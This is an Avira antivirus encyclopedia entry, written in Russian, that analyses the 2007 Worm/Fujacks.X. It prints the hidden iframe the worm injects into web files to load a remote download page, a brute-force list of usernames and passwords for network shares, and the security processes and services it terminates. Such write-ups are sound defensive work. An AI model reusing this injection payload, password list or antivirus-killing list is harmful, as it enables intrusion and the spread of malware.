Имя:Worm/Fujacks.X
Обнаружен:09/02/2007
Вид:Червь
В реальных условиях:Да
Отмеченные факты заражения:Низкий
Потенциал распространения:Средний
Потенциал повреждений:Средний
Файл статистики:Да
Размер файла:118.272 байт.
Контрольная сумма MD5:9d0Ceb2ef643a2f326dfcd8265502ce9
Версия IVDF:6.37.01.66 - пятница, 9 февраля 2007 г.

 Общее Метод распространения:
   • Локальная сеть
   • Подключенные сетевые диски


Псевдонимы (аliases):
   •  Mcafee: W32/Fujacks.h
   •  Kaspersky: Worm.Win32.Fujack.a
   •  F-Secure: Worm.Win32.Fujack.a
   •  Sophos: W32/Fujacks-AJ
   •  Panda: W32/Radoppan.I.drp
   •  Grisoft: Worm/Generic.ANX
   •  Eset: Win32/Fujacks
   •  Bitdefender: Win32.Worm.Fujacks.X


Операционные системы:
   • Windows 95
   • Windows 98
   • Windows 98 SE
   • Windows NT
   • Windows ME
   • Windows 2000
   • Windows XP
   • Windows 2003


Последствия:
   • Отключение приложений безопасности
   • Загружает файлы
   • Создает файлы
   • Снижает уровень настроек безопасности
   • Изменение реестра

 Файлы Создаются собственные копии:
   • %SYSDIR%\drivers\CTFMONT.exe
   • %Диск%\setup.exe



Разделы добавляются в файлы.
– Кому: %все папки%\*.htm Со следующим содержимым:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Кому: %все папки%\*.html Со следующим содержимым:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Кому: %все папки%\*.asp Со следующим содержимым:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Кому: %все папки%\*.php Со следующим содержимым:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Кому: %все папки%\*.jsp Со следующим содержимым:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe

– Кому: %все папки%\*.asp Со следующим содержимым:
   • iframe src="http://www.ctv163.com/**********/down.htm" width="0" height="0" frameborder="0" /iframe




Создаются следующие файлы:

– Незараженный файл:
   • %SYSDIR%\SVKP.sys

%все папки%\Desktop_.ini Файл является безвредным текстовым файлом со следующим содержимым:
   • %актуальная дата%

%Диск%\autorun.inf Файл является безвредным текстовым файлом со следующим содержимым:
   • %код, исполняющий вредоносную программу%




Попытка загрузки следующего файла:

– Следующий URL:
   • http://www.ctv163.com/**********/down.txt
Файл может содержать адреса для загрузки дополнительных источников возможных угроз.

 Реестр Добавляется ключ реестра (бесконечный цикл) для повторного запуска процесса после перезагрузки системы.

–  [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
   • svcshare = %SYSDIR%\drivers\CTMONTv.exe



Удаляются значения следующего ключа реестра:

–  [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
   • RavTask
   • KvMonXP
   • kav
   • KAVPersonal50
   • McAfeeUpdaterUI
   • Network Associates Error Reporting Service
   • ShStatEXE
   • YLive.exe
   • yassistse



Изменяется следующий ключ реестра:

Различные настройки Explorer:
– [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\
   Folder\Hidden\SHOWALL]
   Прежнее значение:
   • CheckedValue = %Настройки пользователя%
   Новое значение:
   • CheckedValue = 0

 Сетевое инфицирование Вредоносная программа пытается установить соединение с другим компьютером для целей дальнейшего распространения. Подробности приводятся далее.


Для обеспечения доступа к удаленному компьютеру используется следующая регистрационная информация:

– Следующий список имен пользователей:
   • Administrator
   • Guest
   • admin
   • Root

– Список паролей:
   • 1234; password; 6969; harley; 123456; golf; pussy; mustang; 1111;
      shadow; 1313; fish; 5150; 7777; qwerty; baseball; 2112; letmein;
      12345678; 12345; ccc; admin; 5201314; qq520; 123; 1234567; 123456789;
      654321; 54321; 111; 000000; abc; 11111111; 88888888; pass; passwd;
      database; abcd; abc123; sybase; 123qwe; server; computer; 520; super;
      123asd; ihavenopass; godblessyou; enable; 2002; 2003; 2600; alpha;
      110; 111111; 121212; 123123; 1234qwer; 123abc; 007; aaa; patrick; pat;
      administrator; root; sex; god; fuckyou; fuck; test; test123; temp;
      temp123; win; asdf; pwd; qwer; yxcv; zxcv; home; xxx; owner; login;
      Login; pw123; love; mypc; mypc123; admin123; mypass; mypass123; 901100



Генарация IP адресов:
Создаются случайные IP адреса. Первые три части IP адреса совпадают с реальным собственным адресом. Производится попытка установить соединение с этими адресами.


Процесс инфицирования:
Загруженный файл сохраняется на удаленном компьютере в следующем виде: %все папки общего доступа%\GameSetup.exe


Снижение скорости:
– Создается следующее количество инфицирующих программных потоков: 10
– В зависимости от пропускной способности Вашего канала возможна потеря производительности. Из-за среднего уровня активности данной вредоносной программы пользователь может и не заметить этого изменения при наличии мощного канала связи.
– Есть вероятность незначительного уменьшения скорости. Причиной может явиться большое число запущенных процессов.

 Завершение процесса Список завершаемых процессов:
   • Mcshield.exe; VsTskMgr.exe; naPrdMgr.exe; UpdaterUI.exe; TBMon.exe;
      scan32.exe; Ravmond.exe; CCenter.exe; RavTask.exe; Rav.exe;
      Ravmon.exe; RavmonD.exe; RavStub.exe; KVXP.kxp; KvMonXP.kxp;
      KVCenter.kxp; KVSrvXP.exe; KRegEx.exe; UIHost.exe; TrojDie.kxp;
      FrogAgent.exe; Logo1_.exe; Logo_1.exe; Rundl132.exe

Завершение процессов с одним из следующих имен окна:
   • Symantec AntiVirus
   • Duba
   • Windows
   • esteem procs
   • System Safety Monitor
   • Wrapped gift Killer
   • Winsock Expert


Список завершаемых служб:
   • sharedaccess; RsCCenter; RsRavMon; RsCCenter; RsRavMon; KVWSC;
      KVSrvXP; KVWSC; KVSrvXP; AVP; kavsvc; McAfeeFramework; McShield;
      McTaskManager; McAfeeFramework; McShield; McTaskManager; navapsvc;
      wscsvc; KPfwSvc; SNDSrvc; ccProxy; ccEvtMgr; ccSetMgr; SPBBCSvc;
      Symantec Core LC; NPFMntor; MskService; FireSvc

 Разное Антиотладка
Проверяется наличие одного из следующих файлов:
   • \\.\TRW
   • \\.\SICE
   • \\.\NTICE
   • \\.\FILEVXD
   • \\.\FILEMON
   • \\.\REGVXD
   • \\.\REGMON

При успешном выполнении перед закрытием отображается следующее:


 Данные файла Язык программирования:
 Программа была написана на Delphi.


Паковщик:
Для осложнения определения и сокращения размера файла он был запакован следующим паковщиком:
   • SVKP

Описание добавил Andrei Gherman в(о) четверг, 18 октября 2007 г.
Описание обновил Andrei Gherman в(о) четверг, 18 октября 2007 г.

Назад . . . .
 
 
 
 

© 2012 Avira Operations GmbH & Co. KG. Все права защищены.